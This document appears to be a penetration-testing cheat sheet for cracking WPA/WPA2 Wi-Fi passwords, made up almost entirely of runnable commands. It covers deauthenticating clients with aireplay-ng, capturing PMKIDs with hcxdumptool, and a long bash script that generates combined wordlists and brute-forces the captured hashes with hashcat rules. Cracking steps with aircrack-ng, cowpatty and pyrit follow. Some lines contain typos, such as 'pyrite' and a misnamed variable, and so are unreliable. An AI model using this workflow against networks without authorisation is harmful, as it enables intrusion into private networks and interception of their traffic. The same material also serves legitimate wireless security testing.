WPA/WPA2

Standard approach - No roaming

Deauthenticate a supplicant
aireplay-ng -0 20 -a <ap_mac> -c <supplicant_mac> <wlan1mon>

1.Deauthenticate with the broadcast address can be very efficient and convenient
2.Airodump should say “WPA Handshake”

Roaming - PMKID attack

It only works on AP that supports roaming.

Installation
apt install libssl-dev libz-dev libpcap-dev libcurl4-openssl-dev
cd /opt
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
make
make install
cd /opt
git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
make install
cd /opt
Attack
1.Traffic capture

Opportunistic attack without mac filtering

hcxdumptool -o <pmkid.pcap> -i <wlan1mon> --filtermode=2 --enable_status=3

Target one or more BSSID

Copy one or more BSSID in a file with all chars in uppercase and without any separator (remove all “:”).
Example: 50D72257AC2F

hcxdumptool -o <pmkid.pcap> -i <wlan1mon> --filterlist=<mac.txt> --filtermode=2 --enable_status=3
2.PCAP to hashes
hcxpcaptool -z <out.hashes> <pmkid.pcap>
3.Crack

Solution 1
WPA-PMKID-PBKDF2 (16800)

Solution 2

hcxpcaptool -o <hccapx.hashes> <pmkid.pcap>

WPA-PMKID-PBKDF2 (2500)

Cracking with a crackstation

#!/bin/bash

# time ./pskraken.sh lower_dico.txt separator.txt
# lower_dico.txt is your custom wordlist with the first letter in lowercase and separator.txt is a file containing one separator by line

sed 's/^\(.\)/\U\1/' lower_dico.txt > upper_dico.txt

#### Combine
echo "Combining..."
/var/app/hashcat-utils/bin/combinator.bin lower_dico.txt lower_dico.txt > ll_dico.txt
/var/app/hashcat-utils/bin/combinator.bin lower_dico.txt upper_dico.txt > lu_dico.txt
/var/app/hashcat-utils/bin/combinator.bin upper_dico.txt lower_dico.txt > ul_dico.txt
/var/app/hashcat-utils/bin/combinator.bin upper_dico.txt upper_dico.txt > uu_dico.txt
cat ll_dico.txt lu_dico.txt ul_dico.txt uu_dico.txt | sort | uniq > concatenated.txt #Wifikey KeyWifi
/var/app/hashcat-utils/bin/combinator.bin ll_dico.txt lower_dico.txt > lll_dico.txt #wifikeymobile
/var/app/hashcat-utils/bin/combinator.bin ul_dico.txt lower_dico.txt > ull_dico.txt #Wifikeymobile
/var/app/hashcat-utils/bin/combinator.bin uu_dico.txt upper_dico.txt > uuu_dico.txt #WifiKeyMobile

#### Separator
echo "Separating..."
for separator in `cat $2`; do
        hashcat -a 1 upper_dico.txt lower_dico.txt -j '$'${separator} --stdout > ul_separated${wseparator}.txt #Wifi-key
        hashcat -a 1 upper_dico.txt upper_dico.txt -j '$'${separator} --stdout > uu_separated${separator}.txt #Wifi-Key
        hashcat -a 1 lower_dico.txt lower_dico.txt -j '$'${separator} --stdout > ll_separated${separator}.txt #wifi-key
        hashcat -a 1 upper_dico.txt uu_separated${separator}.txt -j '$'${separator} --stdout > uuu_separated${separator}.txt #Wifi-Key-Mobile
        echo "[+] Separated with "${separator}
done

#### Cracking
echo "Quick Win Cracking"
dico_quick="lower_dico.txt upper_dico.txt concatenated.txt lll_dico.txt ull_dico.txt"
for dico in $dico_quick; do
        hashcat --stdout $dico -r /var/rules/OneRuleToRuleThemAll.rule | hashcat -m 16800 --potfile-path out.pot out.hashes
        hashcat --stdout $dico -r /var/rules/append-year-n-bang.rule | hashcat -m 16800 --potfile-path out.pot out.hashes
done
hashcat --stdout uuu_dico.txt -r /var/rules/best64.rule | hashcat -m 16800 --potfile-path out.pot out.hashes
hashcat --stdout uuu_dico.txt -r /var/rules/leetspeak.rule | hashcat -m 16800 --potfile-path out.pot out.hashes
hashcat --stdout uuu_dico.txt -r /var/rules/append-year-n-bang.rule | hashcat -m 16800 --potfile-path out.pot out.hashes

echo "Cracking with separators"
for separator in `cat $2`; do
        hashcat --stdout uu_separated${separator}.txt -r /var/rules/best64.rule | hashcat -m 16800 --potfile-path out.pot out.hashes
        hashcat --stdout ul_separated${separator}.txt -r /var/rules/best64.rule | hashcat -m 16800 --potfile-path out.pot out.hashes
        hashcat --stdout ll_separated${separator}.txt -r /var/rules/best64.rule | hashcat -m 16800 --potfile-path out.pot out.hashes
        hashcat --stdout uuu_separated${separator}.txt -r /var/rules/best64.rule | hashcat -m 16800 --potfile-path out.pot out.hashes
        hashcat --stdout uu_separated${separator}.txt -r /var/rules/append-year-n-bang.rule | hashcat -m 16800 --potfile-path out.pot out.hashes
        hashcat --stdout ul_separated${separator}.txt -r /var/rules/append-year-n-bang.rule | hashcat -m 16800 --potfile-path out.pot out.hashes
        hashcat --stdout ll_separated${separator}.txt -r /var/rules/append-year-n-bang.rule | hashcat -m 16800 --potfile-path out.pot out.hashes
        hashcat --stdout uuu_separated${separator}.txt -r /var/rules/append-year-n-bang.rule | hashcat -m 16800 --potfile-path out.pot out.hashes
        hashcat --stdout uu_separated${separator}.txt -r /var/rules/leetspeak.rule | hashcat -m 16800 --potfile-path out.pot out.hashes
        hashcat --stdout ul_separated${separator}.txt -r /var/rules/leetspeak.rule | hashcat -m 16800 --potfile-path out.pot out.hashes
        hashcat --stdout ll_separated${separator}.txt -r /var/rules/leetspeak.rule | hashcat -m 16800 --potfile-path out.pot out.hashes
        hashcat --stdout uuu_separated${separator}.txt -r /var/rules/leetspeak.rule | hashcat -m 16800 --potfile-path out.pot out.hashes
done

echo "Cracking 8 digits long"
hashcat -a 3 -m 16800 --potfile-path out.pot out.hashes ?d?d?d?d?d?d?d?d

echo "Cracking based on english and french wordlists"
hashcat -m 16800 --potfile-path out.pot out.hashes /var/dico/Small/english.txt -r /var/rules/best64.rule
hashcat -m 16800 --potfile-path out.pot out.hashes /var/dico/Small/english.txt -r /var/rules/leetspeak.rule
hashcat -m 16800 --potfile-path out.pot out.hashes /var/dico/Small/english.txt -r /var/rules/append-year-n-bang.rule
hashcat -m 16800 --potfile-path out.pot out.hashes /var/dico/Small/french.txt -r /var/rules/best64.rule
hashcat -m 16800 --potfile-path out.pot out.hashes /var/dico/Small/french.txt -r /var/rules/leetspeak.rule
hashcat -m 16800 --potfile-path out.pot out.hashes /var/dico/Small/french.txt -r /var/rules/append-year-n-bang.rule
/var/app/hashcat-utils/bin/combinator.bin lower_dico.txt /var/dico/Small/english.txt | hashcat -m 16800 --potfile-path out.pot out.hashes
/var/app/hashcat-utils/bin/combinator.bin lower_dico.txt /var/dico/Small/french.txt | hashcat -m 16800 --potfile-path out.pot out.hashes

echo "Cracking based on specific wordlists"
dico_small="/var/dico/Small/rkg.txt /var/dico/Small/cow.txt /var/dico/Small/cnets.txt /var/dico/Small/rockyou.txt"
for dico in $dico_small; do
        hashcat -m 16800 --potfile-path out.pot out.hashes $dico -r /var/rules/best64.rule
        hashcat -m 16800 --potfile-path out.pot out.hashes $dico -r /var/rules/leetspeak.rule
done
hashcat --stdout uuu_dico.txt -r /var/rules/OneRuleToRuleThemAll.rule | hashcat -m 16800 --potfile-path out.pot out.hashes

#### Result
echo "Final Result:"
cat out.pot
Cracking without a crackstation

aircrack

aircrack-ng -w <dico> <cap.pcap>

Rainbow tables - cowpatty

genpmk -f <dico> -d <computed_hashes.txt> -s <essid>
cowpatty -r <cap.pcap> -d <computed_hashes.txt> -2 -s <essid>

GPU - pyrit

pyrit eval
pyrit -i <dico> import_passwords
pyrit -e <essid> create_essid
pyrite batch
pyrite -r <cap.pcap> -b <ap_mac> attack_db
rm -r ~/.pyrit/blobspace

GPU - hashcat

https://hashcat.net/cap2hccapx/
hashcat64.exe -m 2500 -r rules\best64.rule cap\capture.hccapx dict\custom_dict.txt